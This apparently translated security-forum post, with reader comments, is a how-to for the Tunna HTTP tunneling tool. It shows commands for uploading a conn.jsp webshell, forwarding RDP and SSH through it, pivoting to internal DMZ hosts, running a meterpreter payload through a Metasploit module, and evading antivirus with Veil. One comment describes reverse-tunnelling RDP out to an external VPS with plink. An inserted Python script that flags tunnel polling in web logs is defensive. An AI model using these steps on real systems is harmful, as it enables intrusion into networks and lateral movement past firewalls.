How it works: it is essentially an HTTP tunneling tool.

+-------------------------------------------+                     +-------------------------------------------+
| Local Host                                |                     | Remote Host                               |
|-------------------------------------------|                     |-------------------------------------------|
|   +----------+       +------------+       |   +-------------+   |   +------------+        +----------+      |
|   |Client App|+----->|Local Proxy |<==========|  Firewall   |======>|  Webshell  |+------>|Server App|      |
|   +----------+       +------------+       |   +-------------+   |   +------------+        +----------+      |
+-------------------------------------------+

As the diagram shows, the tool first uses proxy.py to listen on a local port and then connects to a webshell deployed on the remote web server; the remote webshell forwards the port-forwarding requests on to the remote host itself or to another host on its internal network, which gives you HTTP tunneling. For internal-network penetration this is a very useful tool.
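The mechanism just described (a local proxy that keeps talking to one server-side script in many small requests) is also what a defender can hunt for in web server logs. The following Python script is an added example, not code from the original post or from the Tunna project: it parses access-log lines in the Apache "combined" format, groups requests by client address and script path, and flags groups with many small requests arriving only fractions of a second apart. The log lines, IP addresses, User-Agent strings and thresholds are all constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" log format; the query string is dropped from the path
# so that every poll of the same script lands in the same group.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],
        "status": int(m.group("status")),
        "size": 0 if m.group("size") == "-" else int(m.group("size")),
    }


def find_tunnel_candidates(lines, min_requests=10, max_mean_interval_s=2.0, max_median_size=256):
    """Flag (client, path) pairs that look like tunnel polling.

    Heuristic (the thresholds are assumptions, tune them per site): at least
    min_requests to one script from one client, on average no more than
    max_mean_interval_s apart, with small responses. A browser fetching a page
    does not behave like this; a proxy keeping a tunnel alive does.
    """
    groups = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            groups[(rec["ip"], rec["path"])].append(rec)

    findings = []
    for (ip, path), recs in groups.items():
        if len(recs) < min_requests:
            continue
        recs.sort(key=lambda r: r["ts"])
        span_s = (recs[-1]["ts"] - recs[0]["ts"]).total_seconds()
        mean_interval_s = span_s / (len(recs) - 1)
        sizes = sorted(r["size"] for r in recs)
        median_size = sizes[len(sizes) // 2]
        post_share = sum(r["method"] == "POST" for r in recs) / len(recs)
        if mean_interval_s <= max_mean_interval_s and median_size <= max_median_size:
            findings.append({
                "ip": ip,
                "path": path,
                "requests": len(recs),
                "mean_interval_s": mean_interval_s,
                "median_size": median_size,
                "post_share": post_share,
            })
    return findings


def constructed_log():
    """Constructed sample, not real traffic: one client polls /conn.jsp twice a
    second and gets 19-byte responses, another client browses normally."""
    lines = []
    for i in range(12):
        lines.append(
            f'10.0.0.5 - - [26/Sep/2013:22:50:{1 + i // 2:02d} -0400] '
            f'"POST /conn.jsp HTTP/1.1" 200 19 "-" "Python-urllib/2.7"'
        )
    for i in range(10):
        lines.append(
            f'10.0.0.9 - - [26/Sep/2013:22:{40 + i:02d}:07 -0400] '
            f'"GET /news.html HTTP/1.1" 200 {4800 + 13 * i} "-" "Mozilla/5.0"'
        )
    lines.append('10.0.0.9 - - [26/Sep/2013:22:41:09 -0400] "GET /style.css HTTP/1.1" 200 2310 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    for f in find_tunnel_candidates(constructed_log()):
        print(f"possible HTTP tunnel: {f['ip']} -> {f['path']}: {f['requests']} requests, "
              f"mean gap {f['mean_interval_s']:.2f}s, median response {f['median_size']} bytes, "
              f"{f['post_share']:.0%} POST")
```

On the constructed sample only the polling client is reported; the ten page views a minute apart from the other client clear the request-count threshold but not the interval or size criteria. Real logs have one-second timestamp resolution, so the mean interval is an estimate; a stricter version would also require the request count per path to be unusual for that path's history.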

Does this tool look familiar? Yes, it works on the same principle as reduh, but Tunna is more stable and faster.

Download: http://www.secforce.com/media/tools/tunna_v0.1.zip

The four examples below are enough to learn how to use the tool.

Example 1:

The website exposes only port 80 to the outside; all other ports are closed. After obtaining a JSP webshell via CVE-2013-225, upload conn.jsp to do the forwarding and connect to the host's other ports.

A direct scan shows that 3389 is closed:

mickey@pentest:~# nmap -sS -p3389 219.x.x.x

Starting Nmap 6.40 ( http://nmap.org ) at 2013-09-26 22:47 EDT
Nmap scan report for 219.x.x.x
Host is up (0.0088s latency).
PORT     STATE SERVICE
3389/tcp close  

Upload conn.jsp to the host through the webshell, then start the connection locally:

python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 3389 -v

The parameters mean:

-l the local port to listen on
-r the remote port to forward to
-v verbose mode

Then run locally:

rdesktop 127.0.0.1:1234

and you are connected to the target's 3389.

Example 2:

For some services, such as SSH, you also need to add the -s parameter so that the connection does not drop.

python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 22 -v -s
ssh localhost -p 1234

Example 3:

Scenario: we already have a JSP shell on a host in the DMZ whose internal IP is 172.16.100.20. Enumeration shows another host in the DMZ (172.16.100.20) with 3389 open, and we want to use HTTP tunneling to reach 3389 on 172.16.100.20. The command is:

python2.7 proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -a 172.16.100.20 -r 3389

There is one extra parameter here, -a, which is the IP address to forward to.

Example 4:

For those who prefer Metasploit, the tool supports that too; if the target runs antivirus, though, the author recommends first using Veil to make the meterpreter payload evade detection.

First copy tunna_exploit.rb into msf's modules/exploits/windows/misc directory:

cp ~/tunna_exploit.rb /root/metasploit-framework/modules/exploits/windows/misc

Then start the exploit:

msf > use exploit/windows/misc/tunna_exploit
msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(tunna_exploit) > set RHOST 1.3.3.7  <-- note: this is the local host's public IP
RHOST => 1.3.3.7
msf exploit(tunna_exploit) > set TARGETURI http://219.x.x.x:8080/conn.jsp
TARGETURI => http://219.x.x.x:8080/conn.jsp
msf exploit(tunna_exploit) > set VERBOSE true
VERBOSE => true
msf exploit(tunna_exploit) > exploit -j

Besides JSP, Tunna also supports the following environments and scripts:

conn.jsp Tested on Apache Tomcat (windows + linux)

conn.aspx Tested on IIS 6+8 (windows server 2003/2012)

conn.php Tested on LAMP + XAMPP + IIS (windows + linux)

Note when using it: the scripts in the metasploit directory are only for use with Metasploit.


Comments (legacy system):

moonfly @ 2013-10-04 12:13:12

I ran into a scenario like this a few days ago too. I didn't know about this local HTTP proxy thing; instead I uploaded plink.exe (I was going to use nc, but the antivirus killed it) and built an SSH tunnel from the remote host to the SSH on port 80 of my external VPS, mapping 3389 to port 3389 on my Linux VPS itself, almost a direct line into the intranet! And basically, as long as the remote server can reach out on any one TCP port, you can do this!

Site reply:

+10086

佚名 @ 2013-10-04 15:24:15

Good stuff, reduh is too slow~

Site reply:

+1

佚名 @ 2013-10-04 16:25:26

I followed the first example but got an error; I tested both locally and on the server, and both failed.

C:\>proxy.py -u http://127.0.0.1/conn.aspx -l 1234 -r 3389
[+] Local Proxy listening at localhost:1234
Remote service to connect to at remotehost:3389
[Server] All good to go, ensure the listener is working ;-)
[+] Spawning keep-alive thread
[-] Keep-alive thread not required
[+] Connected from ('127.0.0.1', 4286)
Received Data: 0 (0) Received Data From Ping Thread: 0 (0) Sent data: 19 (19) Pings sent: 0
[+] Starting Ping thread
Received Data: 0 (0) Received Data From Ping Thread: 0 (0) Sent data: 19 (0) Pings sent: 1
Received Data: 0 (0) Received Data From Ping Thread: 19 (19) Sent data: 19 (0) Pings sent: 1
[-] Disconnected
Received Data: 0 (0) Received Data From Ping Thread: 19 (0) Sent data: 19 (0) Pings sent: 2
[Server] Killing the handler thread

Site reply:

I haven't tried this myself yet, so I'm not sure what the problem is...

佚名 @ 2013-10-04 23:02:58

from: can't read /var/mail/time
import: unable to grab mouse `': Resource temporarily unavailable @ xwindow.c/XSelectWindow/8993.
import: unable to grab mouse `': Resource temporarily unavailable @ xwindow.c/XSelectWindow/8993.
./proxy.py: line 12: syntax error near unexpected token `('
./proxy.py: line 12: `class MainServerSocket(asyncore.dispatcher): #Initialise socket thread'

Tested on BackTrack5 R3. Can someone explain? There are no files under /var/mail/.

Site reply:

I haven't tried this myself yet, so I'm not sure what the problem is...

佚名 @ 2013-10-21 17:29:56

Forwarding 3306 doesn't work; I don't know whether that feature exists.

Site reply:

Er...

佚名 @ 2014-08-09 16:51:35

onn.aspx -l 2020 -r 3389 -s -v
[+] Local Proxy listening at localhost:2020
Remote service to connect to at remotehost:3389
[Server] All good to go, ensure the listener is working ;-)
[+] Spawning keep-alive thread
[-] Keep-alive thread not required
('[+] Connected from', ('127.0.0.1', 50979))
[+] Starting Ping thread
Received Data: 0 (0) Received Data From Ping Thread: 0 (0) Sent data: 19 (19) Pings sent: 0
Received Data: 19 (19) Received Data From Ping Thread: 0 (0) Sent data: 19 (0) Pings sent: 0
[-] Disconnected
Received Data: 19 (0) Received Data From Ping Thread: 0 (0) Sent data: 19 (0) Pings sent: 1
[Server] Killing the handler thread

This happens as soon as I connect. Has anyone run into this before?

Site reply: